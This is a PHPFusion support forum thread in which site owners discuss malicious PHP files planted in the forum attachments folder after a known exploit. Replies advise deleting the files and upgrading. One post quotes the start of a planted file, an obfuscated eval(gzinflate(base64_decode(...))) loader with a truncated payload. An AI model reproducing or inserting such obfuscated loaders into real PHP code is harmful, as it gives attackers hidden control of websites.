Oh no! Where's the JavaScript?
Your Web browser does not have JavaScript enabled or does not support JavaScript. Please enable JavaScript on your Web browser to properly view this Web site, or upgrade to a Web browser that does support JavaScript.
Not a member yet? Click here to register.
Forgot Password?
  1. Home
  2. Discussion Forum
  3. PHPFusion 6 Support
  4. Bugs and Errors - 6
  5. Malicious File Crashing Servers

Malicious File Crashing Servers

Asked Modified Viewed 2,286 times
Back to Forum Index Previous Topic Next Topic
Print
J
jimmessler
J
  • Newbie, joined since
  • Contributed 1 post on the community forums.
  • Started 1 thread in the forums
  • Started this discussions
asked
Newbie

I have not found anything regarding this particular issue, but it concerns PHP 6. One of our hosting companies recently moved their server system from Quebec to Texas. They started having problems with their servers crashing - they identified the issue as coming from one of our websites; and in particular, they identified the path of the offending file: /forum/attachments/dsfsdgds.php.

They finally agreed to allow us to remove the file - the site had been suspended for 4 days. The dsfsdgds.php file had created a "hole" in their system and it allowed other programs to come in and crash the hosting server.

Has anyone run into an issue like this? Is there a patch or a fix for this problem other than renaming directories in PHPFusion?
0 replies

4 posts

A
afoster
A
  • Senior Member, joined since
  • Contributed 725 posts on the community forums.
  • Started 128 threads in the forums
answered
Senior Member

I just checked my /forum/attachments/ folder and found a file there named yxwrm.php which I assume is not part of the original upload? It is rather lengthy and starts with the following code:

Code Download source
<?php
eval(gzinflate(base64_decode('HZzHcoTKlkU/590bDPAuOt4AU3jvYdKBp/DefX2XOjTSQAIyT+69VqlK5Zn2/9Tvd6z6dC//ydKtJLD/Lcp8Ksp//iMlr5RP1rJ1cYUDd8Hr35mcvnl+K7o3CyyrSB4E01QzZgo2Vh5YBem+eI9r7SCx5MXyksUzAk/BQQqp0cJQASo1g+BX79pi2ZIMhhhv80Q9pqbjWwV7VIN+Aqci3hmQNwgW+bu8ahqVsfAzBnKMwNbogjv7m39YVgCn/ZxYkyqYjxoxm8SSp6fpVOE0dFnj4PH7pj9tH3nj+LF4wjgqagRktCmLk/qe0DLdPQfQZQzFEKsFcyUaAmV


and continues along the same format.
Edited by afoster on 24-11-2008 23:07,
0 replies
J
Joe Kriz
J
  • Senior Member, joined since
  • Contributed 281 posts on the community forums.
  • Started 39 threads in the forums
answered
Senior Member

It seems that both of you need to upgrade your system files listed in the news.
0 replies
D
Diemux
D
Diemux 10
Over 1200 v6 and v7 downloads available here: PHPFusion-mods.net

Updated almost daily!
  • Junior Member, joined since
  • Contributed 46 posts on the community forums.
  • Started 8 threads in the forums
answered
Junior Member

These files are part of the recent Pm and search exploit. Delete the files and update the files which are upgraded. (is stated in the news on this page).

ALSO, I really have to say, if this has caused that server to crash they really need to do something about their security... It's almost funny that they can be hacked through something like this...


0 replies
A
afoster
A
  • Senior Member, joined since
  • Contributed 725 posts on the community forums.
  • Started 128 threads in the forums
answered
Senior Member

I had upgraded the files as noted in the news, evidently these files were already there prior to that. Since my site rarely uses the forum, I had not noticed any problems with it. Thanks for the quick response.
0 replies

Category Forum

Bugs and Errors - 6

Labels

None yet

Statistics

  • Views 0 views
  • Posts 4 posts
  • Votes 0 votes
  • Topic users 4 members

0 participants

Notifications

Track thread

You are not receiving notifications from this thread.

Related Questions

Not yet